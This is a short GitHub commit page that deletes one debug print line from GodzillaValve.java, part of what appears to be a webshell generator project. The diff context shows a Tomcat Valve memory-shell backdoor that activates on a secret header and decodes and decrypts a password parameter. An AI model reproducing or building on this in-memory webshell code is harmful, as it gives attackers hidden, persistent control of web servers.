Skip to content

Commit 4669050

Browse files
committed
update: 删除 GodzillaValve 的调试代码
1 parent 146d04c commit 4669050

File tree

1 file changed

+0
-1
lines changed

1 file changed

+0
-1
lines changed

jmg-godzilla/src/main/java/jmg/godzilla/memshell/GodzillaValve.java

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -75,7 +75,6 @@ public void backgroundProcess() {
7575
public void invoke(Request request, Response response) throws IOException, ServletException {
7676
try {
7777
if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
78-
System.out.println(headerName + ":" + headerValue);
7978
HttpSession session = request.getSession();
8079
byte[] data = base64Decode(request.getParameter(pass));
8180
data = this.x(data, false);

0 commit comments

Comments
 (0)